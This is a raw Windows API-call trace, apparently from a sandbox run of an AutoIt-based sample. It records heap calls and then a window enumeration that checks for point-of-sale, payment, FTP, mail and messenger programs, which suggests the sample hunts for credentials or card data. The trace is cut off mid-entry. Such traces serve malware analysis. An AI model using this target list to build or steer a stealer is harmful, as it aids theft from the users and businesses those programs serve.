[0121.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0121.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0121.187] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.187] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.187] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.187] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.187] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.188] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.188] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.188] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.188] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.188] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.188] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.189] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.190] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.191] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1491998, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0121.191] GetProcAddress (hModule=0x77820000, lpProcName="CryptDestroyHash") returned 0x778402a0 [0121.191] CryptDestroyHash (hHash=0x1458ed8) returned 1 [0121.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c448 | out: hHeap=0x12c0000) returned 1 [0121.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.192] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.193] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14176a8 | out: hHeap=0x12c0000) returned 1 [0121.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x1302d50 [0121.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0121.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0121.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.193] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0121.193] GetWindowTextW (in: hWnd=0x10128, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.193] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0121.194] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.194] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0121.194] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.194] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.194] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.194] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.194] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.194] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.194] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.195] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.195] GetWindowTextW (in: hWnd=0x100be, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.195] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.195] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.195] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.195] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.195] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.195] GetWindowTextW (in: hWnd=0x10098, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.196] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.196] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.196] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.196] GetWindowTextW (in: hWnd=0x10080, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.196] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0121.196] GetWindowTextW (in: hWnd=0x20048, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0121.196] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0121.196] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.197] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.197] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.197] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0121.197] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0121.197] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7deed0) returned 0x9 [0121.197] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0121.197] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.197] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0121.197] GetWindowTextW (in: hWnd=0x20286, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0121.198] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0121.198] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.198] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0121.198] GetWindowTextW (in: hWnd=0x20364, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.198] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0121.198] GetWindowTextW (in: hWnd=0x10336, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0121.198] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0121.199] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0121.199] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0121.199] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0121.199] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0121.199] GetWindowTextW (in: hWnd=0x10366, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0121.199] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0121.199] GetWindowTextW (in: hWnd=0x10306, lpString=0x7deed0, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0121.199] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0121.200] GetWindowTextW (in: hWnd=0x10344, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0121.200] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0121.200] GetWindowTextW (in: hWnd=0x10340, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0121.200] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0121.200] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Barca") returned 5 [0121.200] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0121.200] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.201] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.201] GetWindowTextW (in: hWnd=0x10342, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0121.201] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0121.201] GetWindowTextW (in: hWnd=0x10338, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0121.201] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0121.201] GetWindowTextW (in: hWnd=0x10330, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0121.201] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0121.202] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Far") returned 3 [0121.202] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0121.202] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0121.202] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0121.202] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0121.202] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0121.202] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0121.203] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0121.203] GetWindowTextW (in: hWnd=0x10324, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0121.203] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0121.203] GetWindowTextW (in: hWnd=0x10322, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0121.203] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0121.203] GetWindowTextW (in: hWnd=0x10320, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0121.203] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0121.203] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0121.204] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0121.204] GetWindowTextW (in: hWnd=0x10316, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0121.204] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0121.204] GetWindowTextW (in: hWnd=0x10308, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0121.204] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0121.204] GetWindowTextW (in: hWnd=0x10310, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0121.204] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0121.205] GetWindowTextW (in: hWnd=0x10314, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0121.205] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0121.205] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0121.205] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0121.205] GetWindowTextW (in: hWnd=0x10304, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0121.205] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0121.206] GetWindowTextW (in: hWnd=0x10302, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0121.206] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0121.206] GetWindowTextW (in: hWnd=0x10300, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0121.206] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0121.206] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0121.207] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0121.207] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0121.207] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0121.207] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0121.207] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0121.207] GetWindowTextW (in: hWnd=0x102da, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0121.208] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0121.208] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0121.208] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0121.208] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0121.209] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0121.210] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0121.210] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0121.210] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0121.210] GetClassNameW (in: hWnd=0x102ee, 